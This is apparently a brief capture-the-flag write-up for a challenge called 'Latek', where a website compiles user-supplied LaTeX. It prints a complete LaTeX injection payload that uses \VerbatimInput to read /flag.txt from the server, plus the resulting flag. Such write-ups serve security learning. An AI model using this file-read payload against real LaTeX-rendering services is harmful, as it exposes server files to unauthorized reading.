Latek
I haven’t tried much in this CTF, so this is the only WU that I will write. For this challenge, we need to recover the /flag.txt file.
As we can see, we have access to a website that print what is written in the latex input on the left:
I tried some basic injections (found on PayloadAllTheThings like /input(/flag.txt), but this didn’t work as expected. After a bit of research, I found this StackExchange post. I then used the following payload:
\documentclass{article}
\usepackage[dvipsnames]{xcolor}
\usepackage{fancyvrb}
% redefine \VerbatimInput
\RecustomVerbatimCommand{\VerbatimInput}{VerbatimInput}%
{fontsize=\footnotesize,
%
frame=lines, % top and bottom rule only
framesep=2em, % separation between frame and text
rulecolor=\color{Gray},
%
label=\fbox{\color{Black}data.txt},
labelposition=topline,
%
commandchars=\|\(\), % escape character and argument delimiters for
% commands within the verbatim
commentchar=* % comment character
}
\begin{document}
\VerbatimInput{/flag.txt}
\end{document}
And this gave me the flag: amateursCTF{th3_l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t_all0w_rc3_sadly}: